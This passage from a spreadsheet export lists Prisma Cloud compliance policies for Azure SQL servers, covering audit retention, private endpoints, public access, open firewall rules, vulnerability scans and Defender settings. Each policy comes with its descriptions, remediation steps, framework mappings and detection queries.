          <t>This policy identifies SQL Databases that have Auditing Retention less than 90 days. Audit Logs can be used to check for anomalies and gives insight into suspected breaches or misuse of information and access. If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings. It is recommended to configure SQL database Audit Retention to be greater than or equal to 90 days and leave the database-level auditing disabled for all databases.</t>
        </is>
      </c>
      <c r="X2435" t="inlineStr">
        <is>
          <t>If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings. It is recommended that you enable only server-level auditing setting and leave the database-level auditing disabled for all databases.
To configure the Server level audit setting:
1. Log in to the Azure Portal
2. Go to SQL servers
3. Choose the reported each DB server
4. Select 'Auditing', and verify that 'Enable Azure SQL Auditing' is set
5. If Storage is selected, expand 'Advanced properties'
6. Set the Retention (days) setting is greater than 90 days or 0 for unlimited retention.
Note: The default value for the retention period is 0 (unlimited retention).
7. Click on 'Save'
It is recommended to avoid enabling both server auditing and database blob auditing together, unless; If you want to use a different storage account, retention period or Log Analytics Workspace for a specific database or want to use for audit event types or categories for a specific database that differ from the rest of the databases on the server.
To configure the Database level audit setting:
1. Log in to the Azure Portal
2. Go to SQL databases
3. Choose the reported each DB
4. Select 'Auditing', and verify that 'Enable Azure SQL Auditing' is set
5. If Storage is selected, expand 'Advanced properties'
6. Set the Retention (days) setting is greater than 90 days or 0 for unlimited retention.
Note: The default value for the retention period is 0 (unlimited retention).
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2435" t="inlineStr"/>
      <c r="Z2435" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-sql-server-list' AND json.rule = '(serverBlobAuditingPolicy does not exist or serverBlobAuditingPolicy is empty or serverBlobAuditingPolicy.properties.state equals Disabled or serverBlobAuditingPolicy.properties.retentionDays does not exist or (serverBlobAuditingPolicy.properties.storageEndpoint is not empty and serverBlobAuditingPolicy.properties.state equals Enabled and serverBlobAuditingPolicy.properties.retentionDays does not equal 0 and serverBlobAuditingPolicy.properties.retentionDays less than 90))' as X; config from cloud.resource where api.name = 'azure-sql-db-list' AND json.rule = '(blobAuditPolicy does not exist or blobAuditPolicy is empty or blobAuditPolicy.properties.retentionDays does not exist or (blobAuditPolicy.properties.storageEndpoint is not empty and blobAuditPolicy.properties.state equals Enabled and blobAuditPolicy.properties.retentionDays does not equal 0 and blobAuditPolicy.properties.retentionDays less than 90))' as Y; filter '$.Y.blobAuditPolicy.id contains $.X.sqlServer.name'; show Y;</t>
        </is>
      </c>
      <c r="AA2435" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2435" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2435" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-105</t>
        </is>
      </c>
      <c r="AD2435" t="b">
        <v>1</v>
      </c>
      <c r="AE2435" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2435" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>fa6fa903-8887-49dd-917f-91687df98dd1</t>
        </is>
      </c>
      <c r="AI2435" t="inlineStr">
        <is>
          <t>7422d8e8-4b0a-4bc5-9769-462b3cd1c6f6</t>
        </is>
      </c>
      <c r="AJ2435" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2435" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2436" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2436" s="2" t="inlineStr"/>
      <c r="D2436" t="inlineStr"/>
      <c r="E2436" t="inlineStr"/>
      <c r="F2436" t="inlineStr"/>
      <c r="G2436" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2436" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2436" t="inlineStr">
        <is>
          <t>Azure SQL Database server not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2436" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2436" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2436" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2436" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2436" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2436" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2436" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2436" t="inlineStr"/>
      <c r="T2436" t="b">
        <v>0</v>
      </c>
      <c r="U2436" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2436" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2436" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL database servers that are not configured with private endpoint. Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for SQL. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Azure SQL database.</t>
        </is>
      </c>
      <c r="X2436" t="inlineStr">
        <is>
          <t>1. Login to Azure Portal 
2. Navigate to 'SQL Servers' and select the reported server
3. Open the Private endpoint settings
4. Click on Add Private endpoint to create and add a private endpoint
Refer to below link for step by step process:
https://learn.microsoft.com/en-us/azure/private-link/tutorial-private-endpoint-sql-portal 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-45
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-45</t>
        </is>
      </c>
      <c r="Y2436" t="inlineStr"/>
      <c r="Z2436" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.state'] equal ignore case Ready and ['sqlServer'].['properties.privateEndpointConnections'] is empty
{"category":"General","resourceTypes":["azurerm_mssql_server"]}</t>
        </is>
      </c>
      <c r="AA2436" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2436" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2436" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-1069-CKV2_AZURE_45</t>
        </is>
      </c>
      <c r="AD2436" t="b">
        <v>1</v>
      </c>
      <c r="AE2436" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2436" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>857ef0a9-b6e1-4a2a-9ac5-6de2ef0052ec</t>
        </is>
      </c>
      <c r="AI2436" t="inlineStr">
        <is>
          <t>1d115e75-5d4a-435d-bbf7-cc84c2d17068</t>
        </is>
      </c>
      <c r="AJ2436" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2436" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2437">
      <c r="A2437" t="inlineStr">
        <is>
          <t>NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, ITSG-33, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2437" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2437" s="2" t="inlineStr"/>
      <c r="D2437" t="inlineStr"/>
      <c r="E2437" t="inlineStr"/>
      <c r="F2437" t="inlineStr"/>
      <c r="G2437" t="b">
        <v>1</v>
      </c>
      <c r="H24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37" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2437" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2437" t="inlineStr">
        <is>
          <t>Azure SQL server public network access setting is enabled</t>
        </is>
      </c>
      <c r="L2437" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2437" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2437" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2437" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2437" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2437" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2437" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S2437" t="inlineStr"/>
      <c r="T2437" t="b">
        <v>0</v>
      </c>
      <c r="U2437" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2437" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2437" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL servers which have public network access setting enabled.
Publicly accessible SQL servers are vulnerable to external threats with risk of unauthorized access or may remotely exploit any vulnerabilities.
It is recommended to configure the SQL servers with IP-based strict server-level firewall rules or virtual-network rules or private endpoints so that servers are accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2437" t="inlineStr">
        <is>
          <t>To configure IP-based strict server-level firewall rules on your SQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/azure-sql/database/firewall-create-server-level-portal-quickstart
To configure virtual-network rules on your SQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/azure-sql/database/vnet-service-endpoint-rule-overview
To configure private endpoints on your SQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/azure-sql/database/private-endpoint-overview
NOTE: These settings take effect immediately after they're applied. You might experience connection loss if you don't meet the requirements for each setting.</t>
        </is>
      </c>
      <c r="Y2437" t="inlineStr"/>
      <c r="Z2437" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.state'] equal ignore case Ready and ['sqlServer'].['properties.publicNetworkAccess'] equal ignore case Enabled and ['sqlServer'].['properties.privateEndpointConnections'] is empty and firewallRules[*] is empty</t>
        </is>
      </c>
      <c r="AA2437" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2437" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2437" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-764</t>
        </is>
      </c>
      <c r="AD2437" t="b">
        <v>1</v>
      </c>
      <c r="AE2437" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2437" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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37" t="inlineStr">
        <is>
          <t>7099ffe0-3c9e-4fdf-9d70-1149f0740509</t>
        </is>
      </c>
      <c r="AI2437" t="inlineStr">
        <is>
          <t>4c919d9d-9439-41c6-952c-edd7b6ac3829</t>
        </is>
      </c>
      <c r="AJ2437" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2437" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2438">
      <c r="A2438" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, NIST CSF, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, ISO/IEC 27017:2015, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, ISO/IEC 27002:2013, ISO/IEC 27001:2022, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST CSF, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Sarbanes Oxley Act (SOX), PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v7.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, SOC 2, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, NIST CSF, CSA CCM v.4.0.1, NIST CSF, kashan ACSC Information Security Manual (ISM), NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2438" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2438" s="2" t="inlineStr"/>
      <c r="D2438" t="inlineStr"/>
      <c r="E2438" t="inlineStr"/>
      <c r="F2438" t="inlineStr"/>
      <c r="G2438" t="b">
        <v>1</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2438" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2438" t="inlineStr">
        <is>
          <t>Azure SQL Servers Firewall rule allow access to all IPV4 address</t>
        </is>
      </c>
      <c r="L2438" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2438" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2438" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2438" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2438" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2438" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2438" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2438" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2438" t="b">
        <v>0</v>
      </c>
      <c r="U2438" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2438" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2438" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Servers which has Firewall rule that allow access to all IPV4 address. Having a firewall rule with start IP being 0.0.0.0 and end IP being 255.255.255.255 would allow access to SQL server from any host on the internet. It is highly recommended not to use this type of firewall rule in any SQL servers.</t>
        </is>
      </c>
      <c r="X2438" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the 'SQL servers' dashboard
4. Click on the reported SQL server
5. Click on 'Networking' under Security
6. In 'Public access' tab, Under Firewall rules, Delete the rule which has 'Start IP' as 0.0.0.0 and 'End IP' as 255.255.255.255
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2438" t="inlineStr"/>
      <c r="Z2438" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.publicNetworkAccess'] equal ignore case Enabled and firewallRules[?any(startIpAddress equals "0.0.0.0" and endIpAddress equals "255.255.255.255")] exists</t>
        </is>
      </c>
      <c r="AA2438" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2438" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2438" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-629</t>
        </is>
      </c>
      <c r="AD2438" t="b">
        <v>1</v>
      </c>
      <c r="AE2438" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2438" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>d3b3d6ff-5011-49ae-9228-10c6399481b4</t>
        </is>
      </c>
      <c r="AI2438" t="inlineStr">
        <is>
          <t>df1d2aa4-e7bc-4f0b-a5ae-f4ea971e12e5</t>
        </is>
      </c>
      <c r="AJ2438" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2438" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2439">
      <c r="A2439" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, NIST CSF, MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.0.0 (Azure) Level 2, PCI DSS v3.2.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.3.0 (Azure), CIS v1.5.0 (Azure) - Level 2, Azure Security Benchmark (v3), ISO/IEC 27017:2015, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2), NIST SP 800-171 Revision 3, Copy of CIS v1.2.0 (Azure), Azure Security Benchmark (v2), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, NIST CSF, Azure Security Benchmark (v2), HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ITSG-33, Microsoft Cloud Security Benchmark v1, MTSBv2_Azure, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, TX-RAMP Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST SP 800-172, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2024.2, NIST CSF, NIST CSF, Azure Security Benchmark (v2), NIST CSF, TX-RAMP Level 1, Azure Security Benchmark (v3), ISO/IEC 27002:2013, NIST CSF, CIS v1.4.0 (Azure), CIS v1.2.0 (Azure), CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2439" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2439" s="2" t="inlineStr"/>
      <c r="D2439" t="inlineStr"/>
      <c r="E2439" t="inlineStr"/>
      <c r="F2439" t="inlineStr"/>
      <c r="G2439" t="b">
        <v>0</v>
      </c>
      <c r="H24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39" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2439" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2439" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment Periodic recurring scans is disabled</t>
        </is>
      </c>
      <c r="L2439" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2439" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2439" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2439" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2439" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2439" t="inlineStr">
        <is>
          <t>Guidelines for System Management</t>
        </is>
      </c>
      <c r="R2439" t="inlineStr">
        <is>
          <t>ISM-1693</t>
        </is>
      </c>
      <c r="S2439" t="inlineStr"/>
      <c r="T2439" t="b">
        <v>0</v>
      </c>
      <c r="U2439" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2439" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2439" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Server which has ADS Vulnerability Assessment Periodic recurring scans disabled. Advanced Data Security - Vulnerability Assessment 'Periodic recurring scans' schedules periodic vulnerability scanning for the SQL server and Databases. It is recommended to enable ADS - VA Periodic recurring scans which provides risk visibility based on updated known vulnerability signatures and best practices.</t>
        </is>
      </c>
      <c r="X2439" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'SQL servers', and select the SQL server you need to modify
3. Click on 'Microsoft Defender for Cloud' under 'Security'
4. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
5. Set 'Periodic recurring scans' to 'ON' under 'VULNERABILITY ASSESSMENT SETTINGS'
6. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2439" t="inlineStr"/>
      <c r="Z2439" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = vulnerabilityAssessments[*].properties.storageContainerPath exists and vulnerabilityAssessments[*].properties.recurringScans.isEnabled is false</t>
        </is>
      </c>
      <c r="AA2439" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2439" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2439" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-656</t>
        </is>
      </c>
      <c r="AD2439" t="b">
        <v>1</v>
      </c>
      <c r="AE2439" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2439" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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39" t="inlineStr">
        <is>
          <t>aa62cb1d-2bcb-478b-af5c-62462f8a6cba</t>
        </is>
      </c>
      <c r="AI2439" t="inlineStr">
        <is>
          <t>5c28d8a1-5f19-4914-a9bc-60e201d3939c</t>
        </is>
      </c>
      <c r="AJ2439" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2439" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2440">
      <c r="A2440" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, CIS v1.3.1 (Azure), Azure Security Benchmark (v3), ISO/IEC 27017:2015, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), CIS v1.3.0 (Azure), CIS v1.4.0 (Azure), NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CIS v1.2.0 (Azure), Azure Security Benchmark (v3), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS v1.1 (Azure), NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2440" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2440" s="2" t="inlineStr"/>
      <c r="D2440" t="inlineStr"/>
      <c r="E2440" t="inlineStr"/>
      <c r="F2440" t="inlineStr"/>
      <c r="G2440" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2440" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2440" t="inlineStr">
        <is>
          <t>Azure SQL server Defender setting is set to Off</t>
        </is>
      </c>
      <c r="L2440" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2440" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2440" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2440" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2440" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2440" t="inlineStr">
        <is>
          <t>12</t>
        </is>
      </c>
      <c r="R2440" t="inlineStr">
        <is>
          <t>12.1.2</t>
        </is>
      </c>
      <c r="S2440" t="inlineStr"/>
      <c r="T2440" t="b">
        <v>0</v>
      </c>
      <c r="U2440" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2440" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2440" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL server which have Defender setting set to Off. Azure Defender for SQL provides a new layer of security, which enables customers to detect and respond to potential threats as they occur by providing security alerts on anomalous activities. Users will receive an alert upon suspicious database activities, potential vulnerabilities, SQL injection attacks, as well as anomalous database access patterns. Advanced threat protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.</t>
        </is>
      </c>
      <c r="X2440" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Go to the reported SQL server
3. Select 'SQL servers', Click on the SQL server instance you wanted to modify
4. Click on 'Microsoft Defender for Cloud' under 'Security'
5. Click on 'Enable Microsoft Defender for SQL' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy
IaC: Refer the documentation for more details,
